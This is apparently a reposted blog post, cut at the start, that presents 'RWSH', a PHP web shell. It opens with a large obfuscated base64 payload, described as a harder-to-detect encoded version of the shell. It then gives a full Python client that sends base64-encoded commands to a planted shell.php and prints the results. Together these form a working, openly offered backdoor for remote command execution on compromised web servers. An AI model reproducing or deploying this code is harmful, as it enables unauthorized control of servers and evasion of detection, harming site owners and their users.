FnTTIwMUp5T1lIenE1WlF1T0QxRTNHenRlRTFjZnEyTTVYMnVHRlRXbERtQTVKYUVrRktWbUcxcTJEMjlsR1NTT01VRWhvM3FHWW1FQ0QyMGtMSVprRlNBdkUxcWhHelo0RVJNVXBIa1RKSHVpR1NXZHFJQVlYMEgzckoxSkFGZ2hvS3lHTVFNRFowNU1GSE1sRUlNMG94amxJSnRpSUh4NUYxeVVuU1cxRHgxQXJHdUhNVUFEbzJJSUpUZ2NBeHFFb0h0anFUVjVMSnFVcklXZUZKOGpEM0VSREhjSVgxVjVuS0xsR3lPRUFVV25uSWNJSUtaZUh5SUtwM3QwWlFXV0ZTSWFKd0kxSFI1QU1tRVdFR0VHcDFjUUkwcVpaenlib0txeE16QUNZM3FYSDNxZUlSZmxCSjBlTW1SbEpRRDNxeXF4QVFXeXB6cWtvYXU1WTJ1TFpINVBwU1dVSTNTeEpUNG1ySnlLRzBIbG55eDJNSUl2Rkh5ZkcxT1dEeUw0bjJjU01UdGVuYXV1cEpNSnFURWNvS3VUSVR0bVgxYzFGSmdnRzNNNUV5Y0NBd3lWb21TSExKRGtNU0FYRDJmbEVIY2RHUURscFRTRHFTTVRxSHU2QUp0M0RLQVdGYXgxbkpJbkx6ZzVZMlNWTTBEMm5TSTBNSEE1RjFJR0l4NDNIM0V3THhBQ29KQU1uVDVtSDFNbEFKa2lIMVNubzJBU3F2Z0pFR3VDSWF5QnBhQWVJeFprRlFIaUhRTmpHMkltSTNNMkRJeVdFeXVlcEdBbXAyY0lwMEVLcUhjVFpVcUZYM1N5RzBWMVp5TU1FeFNoRTNFQUpRV2VKeDFPb1NjREdKWjRFYWNnQXp5ZHB5QUlFS1dRcXhBS0dhcTFMMUVMWlRNMUl6eUpaUlppRzJxaEFhTTBvVHRpRHY5QkJVSGVvU0FVWko1blp6U21vUjFnckh5akVLTDBuSmYycEhFbkZHcW5JR3BpRzFiNW9JV3hIbUQzSHhqMEZIU1dwUU91RjFNMElhdGtwUUwyRGF1T0RIU2tGVFNBRzNXekwyY1dNMWM0TXg1T3F3QTRJVElTRlFJY3BtSVhvU0k2TTF4NUJKcGxxS2MyQWF5TXJJSDBJS0kzbnd1S0lVdWJIR3BpTVFSalpVSWVvd0FURUl5ZkxKUmxHSDExRnpFRlpIa1JxUVcwRlVJZnBJcWhKYWNTRjNXM1oxT01wejFRSVRTbEhSU2VwM09CQVVNZm5JVjJZbUFYWjBmNVpSdWlMSHFRSnhIakZReUdHSVdPcG1XU3JKNTJIbU1TSnpjd0hIWmlwYWNtRXhJSnBVV2pBbUkxbkoxUkVGZ2tJMnRtRkdNQ0lIMXZZMXBlSHh5SEFKV0VKUDl1RktFR1gzSVdGR1c1WmF5M0lKU1pER0lncmFPbEUxcVRGR09sRDBBYUdHdW5aSk13QlRXbHF4OWNMbU9jR3o5WFkyZ09uYWNWcnh1bkpUQVhYMmZtSmF1Q3FUY0ZZMXFLclJ1bEZKSTNGd0QxRHdBT0V4OTNwMmtKRElFdUFVUmVBVHVVb1I5RFkyNVpIUnVVTXZnY0EzeUZxSWN4cVNFWXJIdUJNME14SFFFbU1GZmtCU3FPWndFZm9VV1FNSDEzRUhBRm4xRGVFUUF5QUhJUXJJcDBvR1NISWFWNEh4U01EenlLcFVPQW52ZzRaS1YyRjBTZHAzSGVBM3kyRjA1Q0FKU0pNYUFYSUtjSkF6Z01xUnlqRlRxSEd6MXZNMHFLbjBrVkh4RTJCU3lpQXgxT0FtT1NIMHVRRjBWbG9URUxNbXU0TUd4MEFSMDBZMXl2bjFxVXF3eTBvSXAyR1FEMkcxUzFxMXlHcmFNd3F4OUFJM0VLRWF1M0dhRVJGeUFBQTA1aXFVeVBHMHFhQkpNVEJHTTVadmdJSXlFa294NDBMMUVPSVR0aUh6Y2FMSEVhSEhNdloySUVIUXEwcFFNMkxLdG1Jek16bkg1NUgwQVlFSmNjcEY5MlgyRURKSjE2RUhNSHAzRVVHMU1ITHhFMHFJQUdYMkVMbkg1U3B5TXhHSkQxRVV1bW8zU2hIMEhlRTA1d28yRWhGSmpsRjN1Zm5RdVBCSXFoREpjNEd4OXZvVUQwREh5ZEQyYzRJejlVb3l5V3JVT0VyeEVRQTBxRm5hTGtGSmtncUtxR0VHRXduS08xSXpNZ3AxU1FER09DbndNaUlUMUFGYXFqbjNxZG8zRTNNd0VqbjBjS29KRDJNMDFlcVBnU25KWjBES0xlRTN5Z3BLRWZFUDloSnpjeHFIazBGSVNNSnpnVkhUZjJEYVdHQkpJWnFLQW1wVHVMWkg1QUh5dUJISkFRQXdNbEZQZzBFbVdERjNBd0YyZmVaUkFIb1IxVkhUSWpIMjkwblJXNEZ2OWhYM1dYSVV0MkZhYzZFMlMzQXhNeUlSMDJxelNiTDJBdkdSNVZvVHQzR0o1UUYxcWNvMGs2QW1xbnBLdVhBVUFFSlFTUkhGOGlxd01rR21Td0RLWjFJYVZtWnlBT0hSQUJJeFN3TDBreW4yMUxuU2IwcnpJZkhtSWtJS0FpRnpnM0V4SU9MSU1CbndTVFoxU2FBVHAwWkh0NUp3cVJNMDBpRlQ1d3B2Z1dyU09FcXlxRnBtdTNaSU9USG1NRkhIU3ZHVUlPcVJJd0EzdVpFR09MQXg1YUJSSVNFSjU1bnhjM0h5T2Fyd3FQclNxTE1SeVhYM040clQxbkxKdDVwM3k2cVVxRG96NVVNUU9ub0dWZUd3cXZwSldhRVVEaUlKSVhNUXFEcmFibU1LTzREbU92b3pmMlpTeUxBd3lrcTBBVk16SXpIMElYcVNiNUFTdUFFME1qbzFxbkRhUm1EMUFJRzB0Mkl5dWRIeHlPQTB1a0VVT2RxSFJlWkpWbHBHSDFxMnF5SHhaMHFRSVRCVXlKTDB5bUlIeDBMbDlIWnpjWW96Y0pHeUlSTVRNRER4azRIUUxtRkoxNXJ5QURMM0llSVFMMUJUTWFuMjFWRVNjVEJUeVluMHlqTHlibHFtRWlFemdEcXd5WEF5TWJvS2NYSUhTeHJRTjRHS0llWTBJbkkxV0VvME1pb3l0NW8wZ1lJUU9kTEtFSk1UZ3pHMjE2Wkl5eHJ6ODVueHVhcGF0MEZHcXZBMWNnSG1PYkh6dW1aR1NUSkhjTUlINDJwM3BtcUlFUUp4VjVvR3k2SW1XUG5JRWhuUnVjRlFPNkdtT3lwVHFmRnpNVUd4TVhHeFN6QUdFR1kwdWVueU16QlJrY0htdGVxU0VQWnhMam5IeVdJVE1ESEhxME0ycU9NYWM2R1FJMEFUeUVvSUxtRUhXUEFVRWhaSjEyR2FjdUgydWFuS0VYRVJSakQzeWZxMHFYQXdFR0dtTWZNek1sQlJrZ256V0NwUVZpTUlJVnJ6WjRIU2NuRG15MG8zeUtFMnhqQXpJVkF6V0lGS0laRm1TYkVIU0Nud0E2clRTZ3BtcVhGSGtHTUpjd0YyTTJaSHlYb0l5bER2Z2FJeFIwSEgxbFhtT1RYMmprTVFTZExtcUJvM3lPcDI1WUpVQUdHbUFKTTFWaVozSWNCSkkyRHdBVURLeWhCR1MzcFRTd3BUTVJFUmJpRjJ5SVkwY0pEM1NVSUdwa0Z6U2lEejlNR0hTT0V3RU9aSmNhb2F1WEYwQXhNeGNITVFMZVgya0xIbXl3TTFWNVkwMTBHMEE0RDJXWlpURXdxS0VrcUtWZUUyMVVFMXFQbndTeXJ4SUhad0FDQXlaakkweWtIVXgycElFbEh4a0VxSjlhRnlabUdVcDNNVHFDSVJBNHF4U1pvMngzSHlNbUZ4MWNBSHVXQXl1eHBtTmVGU3l3Wkd5MHJRV1NuUjhqb0laa1pLQTNCUmd2bnl1QUwzY3ZHMEF5Wnl1TUcyQXZuSVZlQTJXbG55RTZIM0VnSEt1WnBISURyenVWRDJjRUdRT0pJeEFNblNxaG56dWNNekFEb3hFaHEzQUNJM001Qko0ZW9TTVZKYXgzQWFNTVoyU1dJSkUzRHo5a0gwV21xd1oxSVR5NkhLWm1BUUw1cUpjS25JTTBFMUVDcHh5NHFTdVpFVU1McHpjYkF4TXZHM1duR0t1REkxSWJNR01jSVI1RHAxT1RYMnFMSXpXaEJUQXpwUDlFSkhXQ3J4V0FFUmtaWnd1ekl4cDJxMU1NQkdxMFp6VzJFUGZtRTFxbW9TRTJxVGtZbmFNWUR6TWhHSk1ITVJNZ0ExUjFNVFc0QlQxWHBJUzVHMEkzTTJJVEEweWdGMjVkcHhXVnBJWmlJUlMxRlQ5VElReXpFU01pcG1BSXJLeVpNSWNhTEhBWUFtRWJveEw0THhxSkFSY0JNd05lTDBxNURIa0hHVU1hWDN0MEUyOUdKSDFub1NJRG5IcDVIMDQ0bzBjNHJTV2xJbDhrRjAxNE1JVmlyeFNBTElTaEZUeDVaSXExSUtPUkhHeG1ZbXFDclNwbUl3dVhIVEUzWko5dkVSOUZNSjlUWkh1ZUlUSUVYMHVDSFVPdU16NXZMM0Fqb3g1WkJSMUFJR0lsQlRqZUd4dUtHeGZsSkpBVEl2OVFEekUwWlVaMXBTSTBEd0VacUhNWnJURWtMMmdLSVNBUk0zSWhHSjlCSno1Mkp3cWtvUk1NSlV1UERJY1lBYUxrb1FXSkpRSVZGSHF4cDJqbEpScWxNMGNobndXNnJSRVRvYWNrcndPY0pINTBaU01QRDJTVlgwQVpvbUwzR3dEMU1LcTJGUmMySEljZ29JU0ZNd1ozQUpIMk1hYmtGMjV5THoxRXJUTVJMeVdFTXg5aHJ6eTVIbVNMblR1ZnJKTG1aeGMxcDBnNkZHcVdGbUlJTUtJSUZUU3hwMDlMRmxna3AxSWZvS0kyWko5RUlSQVFvVFN6Sng1Q29UTWlHUmd2WlRxZUlUNVFBVXV1bjJFREFIZ0ZBU0VpRGF0a00yYjRESEk2WjBTZk1LdGlBUUhrTHY5MVpReTZuSEFLbnprMEVJdURMS3VLWkhJdVkxU1JZMkhsWDBIaXFJQXZKU3VHRHp5V0F5SUdBM0lCWTJJRlkyU0ZIMk1QcUhNNUQyU1ZuVE1SQko1dUlKNVlYMjlMSFRnNnFHUmtESmJtQTF1YUF5TTVaVHFJREtjeVpLU0xxMUV6clIxWVkyTWhJMXE1THdINEhINVRubXlmcVRTWkZKQTVEYUlZSUoxTEpLTzFISmtHRlF1aUpURXdKU3RpcTJnSEYzU1RYMFNKcDBMM0pRSTNuUU1pQlFNZG9teVNIR01JQVNBUkVhdXhuM3FGWm1aNVgzTXZJYXFZcTNaaUVsZmlFMDQwcUhXMUwzdWtyR0hsbjBxVHBKcTVBMHVXQVNNd0hHeUdHeXE0cktNbFp4a2dHUXljTVJFUkQyRDRJM1o1RnhNWkhTeG1aU3llcFF5NFkzVmVxeHltTWxnSkRtT0ZvVXFaTVVTdW5JTGtCU09YSFRJREQxeWRFUXFscXhrVHBKa1ZyeUljcVVFT0ZHU0VvVXA1QXhrVW5LTWRBdjkwQXg0bW96MU9FMDFqTUhmMUJLV1lxVDllRktjYU1tRDNvUU9lSEdIbEFQZzNGR0EyQUdxRkVKRVpGbU5qQko5Y24yMWRER0hsb0p1S3EyTGxyYXF1WDFFakdtV2JIeHFWWlJxRlpSY2xMd0llTVJJVkVTQTFESnlLckd5MkkwV21ISGNEb3hXblhteVVIM01ncFNEZURKdXhIUmNURDIwbUgySWJvdjlGcXhFaUhtcWVuUnllQTFiME1IMWNaUURsSklTWElLdWRFejAyQVRiNUkwTWhaSDlUckgxQURLdDBaVU1Bb0hnV3AwRTJJVGtNcEo1Nkx6NUNuUXlIWWw5bE1JcVVIR041WlJJYnBHeVdaSjVocVRjVHJLcGtIMDRpTG1PUm4wV2dveVprTHp0ZUp5eVRHSEFGcktXeXAwU2FISGdJSHdXaEhJTmtxejFublJ5MU13U1hHVDV2TTBjd3F4azNHS0E0blN5bUYxdW1IVDV5cDJFRW93SWNCS2NDcnprek1JQWlMeWN3ckdBeUkwZjFvYUFIbnljSnB6Y2xBSElZRDFXUm9SV0xvVHFHQTB5ZXJhWjRIMFdNSHhJM25KZjFMSVdEQTBNUE1GZ0VNVHVqWDBTUVpGZzVNMEF6clRmbEpTdUZGS012bklXRXFSa1VvVEl6TTFJaUpTTURGMk1UbzB0MExIVmVCSUVkWlBnYm9HdWpId01jQVVTT3J5eU1NUkljcktPaHB6TWRFSXFEQUprRm5IOURNSEVYWkdTUEdKSTJuYUw0REl5T0xGOXZEeElCR0hnMkV4OTNMYUV2SlVJUUUwRVpKSjV4SFFFVm9KMTFvYVdPb2FMZUpIU0VEd01mSVFXZ24yazRaU05tTUo1am9SODFyS015SXpEMm5IcWJFSHBpRVNPbnEwUmlFSkl6RW1ONUVsZ1lyS3FlRlJxeUkzdGpFSHVEclRJWEhKSVpyUjgycHg1UEVGZmtMMnlWb3d1Qkx3eVNJUXhtWkdOMUUzdW5GemN1TTJXNXBTU3pyR09CRlFBbElGOW5GMElTRm1EakVHVmxISnlSQUtFeUZheTVJSXFrWmFXNEFIVmlBUXFacUlTQm4ycUhvMFZtSFR5NEhhSTNuenVZTDBqMEVVTUxJeGt2SElJQ3BSMXpMMkFRcEoxZERhV1ZBMXFUTVNFS01JT2ZCVXVNclJNR0RGOWJCS0UxSFNIaUpHQWtMMklRQlRwNUQzdTFJSlNlblRjVVpJU2hyYVd3SndBMEdRSXpJR0lHR0lNREd5T1RHVGdXcDN5bG4yZ0ZHekFZQXdxT0pQZzBGd0VVb1RxWERLRGtFMmd6WklFVkZJcVRYbVdZR0haMnJIQXpwUUlibkdNS0h5cWlEYVprcG15MklVSVBxemNnRnp5VEJSV2xxS0FGRTN1WXJVU2lZMldpTTFOaVkxeVZwSVdpclRreUZGOWFxR1YwcEhJU0hIQVBIYVY1Qkt1Qk0xRUhvVHVEWjB1dUYzeVlxVU95TDB5VFpScWtMM1dhWDBnakZ6RUFKU0VBWmFxV3BSRWZvU1oxcW1Jek16Y1FIMloxSXlTVW5JRDFBMmtKTVJqNUR4eVhFM0FIR2xnQXF3SDJGMUVMcHo1YXBIY2NGMFM2TXhFZ25heVduU1dFcFRxZ0FUTUZweVZscTNJbkJUMWtMME1SblFaa0l3dGVueFdsTHdBY0VhT3hFUDkzcEpIbG8wMVZId1pqWm1JNEZ6a0JYMDA0b0liNG8yRWJBenlHbkd5WlpHWjJFeUUySEtPRU13U0paVERqQkh5enB3cUpIVEUzQXpjVElhU0hMSU9IRHo4NUgzQVhaeGt3QkpFdklUQTZwSXFmSnhmZVgzRUxxeVdqRXoxTUFKcVpYMDFnRG1MMUgyOVNKUUVLRkhNYXExTWxIMWNrSXhNU013QUdGYWNlbjF0bUV6YzJISGNsQkdTenFTeVdyUmtETHh1Wk1UQTZyUXk2WlQ1Zm9JRGVaUnF3blFxZ0xIZ3ZBUVY1RjFFMUF4RVVHUmoycHhMa01UTXVCUnVVWTFNd0RJTG1BMldrTXdNWnF3SVpGVEFsSEdxaG56OXZMYVNYTTFNMEYwV1RHU3lqcVRTNE1VTWhaYUwwQkpqbXBKY2lBYVdiclJFMVpJY2RIYUk1bklIZVp4TUVGS3VQWkhBa0gxeWhxR3F6SFJnSUdTVjRYMXE1RkhXSElTV2FyUVdlWlRTQ0EwMWxueFN2RElJRUR3cUluUjlqbndJZ0hKNGxBVXl2TVFEbU16QWFveHg1RHpjUUYxTDNaenlibkg5a0RtT0xvSGtBcVBnRUJRTjRyU0VjRnZmbVptcWxHMmYzWjFWa0ZScXhNeVNWRTFJVU1TeWlFenBsSDF1MVoyOURNM1c0QktBdkFGOGlxUjVRRkhmMUR5Y0lJMVIxQUtJeUV6eWtaSEFLbkpJRnBRdUZvbUFLTGF1WUlRRUZCUkFmcDB0M29tSTRHR3VMTTNiZXJheTRGU1dBRXprNVpTU1VJSjFtR0hFekFUcDFJeHl6RjF1UUdIQW5aUmtsWmFBWUJSNUFGeERsREhFWXF4eU1JVVNmSEpXSk0zTVZKSk1NblJXWnBtU3ZHMEFNQTBFV256Z2daM2NoTEljV1pHT2NJd0FPQXhrRkJRWmxyeFoyckd0MElJQXVFUGdRcDA5M0FRSWNEbGYyQlFBWE0wV2JweEExQTJINEhJUmpyYXVKSUlWNUl6UzZBS2I0RDNEM3JKa01xMDFVWkhmNG9hSUFJMVcxQkh5dUFLU2VHMDFFcHhmMk1SMUVGVXl5cFV5dlp3TW5yS09ocEdPU3JUNUNIUDhqb3pSZUczSUtvMU9nSEtXd254NGVCR09ETHlPNHJ3V0daMnlhSG11MHBSMWVyVFM1TWFxQ0xGOGxveFdERGFFMnB3eDRwVDVMcmFNRUhSVm1NeU9ScFV4MEh6Z0VuSXBtRVRrNHJUVzNBUGZsR3hBdm4yY1VuUVNpQVFXUEEwa2FEeXgxTHpFdkQyeW5BSVYxRVN0NFhtUjVuMVcxcHdFWUhKQURyR3AwRlJTeEJVcVFHSVo0cHhjbE1QZ0RFVVplWmFING5ITWxNYVNUcXo5RkVIdVVEbXlSSHgwZW54U3hEM2M2b2FJMHBVcUZaMEluRUlTVkF6cDBaMDUyblJJRUUwa0RHMGdFQVVJdUxKamVKVGtqcTBJT0VSdUNuSmdrbmw5REdHV2FvMkVpSVNjWm54QUNySXU2SUhqZUhHQUlBSkF1QklTdkVSTGpwUU02R0pFQUhJdUVJMUVIWnlBa3J5QW1xU0lSb0pnbUdLV3ZIMk1kSUp5RG5KMUdJSDVPSnhXT3BSSUdBM0lDTUdNYkZ4NDJHbVptSkt1SG9tTVlJYU9NckhnY1p6ZmxxUVdWcDBaZVpIV1dGSkVRSEpFMEFRV2tyUUVGSTA1bEVHU01BUVdZSlFFdk0yOWtFS3lGckhjUUh5dUVIUnVuWlVxVEEycWdFSU9pcXdTMEpSdVBGSDlmQUhTR0RITVpES08yTVRiaVpLdUNFVE1NRVJJQ1pKSGtMelNscXhmM0RGZ0lEbVoyRlV1a0F6V2lMMGNtRUhFM3JJV0xFM0FjRGFXaVp4eUJIU0QxRUtNVkF6dWtBVE1mR0hBMUV4Y3dISGdUcDBTZ0JJeGVKelNPQWFWa3JKRTBuenRsRkhFUUhGZ1ZaMDEyQTBJV3F6OWZyUk1Jcng1NER5STBHM0lLSEp5ZEV4dW1EbU9SSkpJT3JHQTZNU1dKcFVTbUF4UjJGRmYxRGFNZEpSZmpNS3ExcHp5NkhHTzFabU1PWDBBVW5tT0tEMUlucFNPd29sZ0pKUjFnb3hmMHFUa01uM3lIbkY5VXJKOGtGM09VRXhBbG5HQWdwR1NYSDFNekQxdVBGMVc2RDIxaEUzeU1GYUlkSndxNkpSeXlKSVNRcDN5MUlUOUFIMVpqSEtxdkpScWxaekg1RVFBY1owNXVKVWNaWW1FQ0dSdDJCSVNMblRJeXJHU2lHSXlJcDN5bkx4U3haeElsblN1dlgyTXdFeEVWWkgxSG95eUZEYWN1cUtIMk1LV2lueU9qcnlBd0RtSUlBS1Y0SXlSM0kxcUJuS0liR3hNTHF6QTJIVUFNRkY4Mk1UODNuMVd5cFQ4ZUkzeWtESE1TRlI4MFgxTVVxM3k2SkpBZHJ6WjVBMlZpSHpXNUYzdVBad0kxWmFTakVSZ2VKU3RtRkpjT28yOVZMRjlocnpJR0kyVjBEYXlMckhNYnJ3dTVFUXkwSEpaam5LRW5GUUVMR3pXU0xKWjJGSHVGQkY5UE0ydXlwSGtoRHh5WElHeXVxUjRrTXl1ek13WmlCR3Q0QlA4aVltRXonKSkpKSk7'));
?>

On the client side of things, RWSH does its best to try to simulate an interactive shell. Upon initial connection, the client will get the username (via whoami) and the hostname (via hostname), and then create a fake BASH-ish prompt from this information. Note that this will fail on any OS that doesn’t support these commands, at least for the time being.

After the initialization is complete, the client enters an infinite loop that accepts user input from this prompt, base64 encodes it, sends the request to the server, and displays the base64 decoded results.

client.py 代码:

#!/usr/bin/python
 
import random
import requests
import string
import base64

def main():
    session = requests.Session()
    session.trust_env = False
     
    ip = "127.0.0.1"
    port = "8081"
    filename = "shell.php"
    
    print filename
    param = "cmd"
    
    url = "http://" + ip + ":" + port + "/" + filename
    
    print "\n[*] Connecting to web shell:"
    print "    " + url
    
    print "\n[*] Obtaining username."
    
    r = session.get(url, params={param: base64.b64encode("whoami")})
    username = base64.b64decode(r.text)
    
    if "\\" in username:
        username = username.split("\\",1)[1]
        
    print "\n[*] Obtaining hostname."
    
    r = session.get(url, params={param: base64.b64encode("hostname")})
    hostname = base64.b64decode(r.text)
    
    print "\n[+] Returning prompt!\n\n"
    
    try:
        while True:
            cmd = raw_input(username + "@" + hostname + ":~$ ")
            if cmd == "exit":
                print "\n\n[-] EXITING\n"
                return
            else:
                encoded = base64.b64encode(cmd)
                r = session.get(url, params={param: encoded})
                print base64.b64decode(r.text) + "\n"
    except KeyboardInterrupt:
        print "\n\n\n[-] EXITING\n"
        return
    
if __name__ == "__main__":
    main()

Execution wise, the client does a good job of providing a more shell-like environment.


If Python is not available, or if you don’t feel like using the client, then the RWSH “server” can still be accessed via a browser. You will need to encode the requests and decode the responses manually, but that is the only added overhead required”


Apart from the client and the server, I have also included an example of the web shell in an encoded format. While this method isn’t specific to this shell, it does offer a slightly harder to detect version along with instructions on encoding/decoding it for yourself.

The code and updates are located in my GitHub repository. This is also where I keep an up-to-date TODO list for the project (or merge your pull requests?!).

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值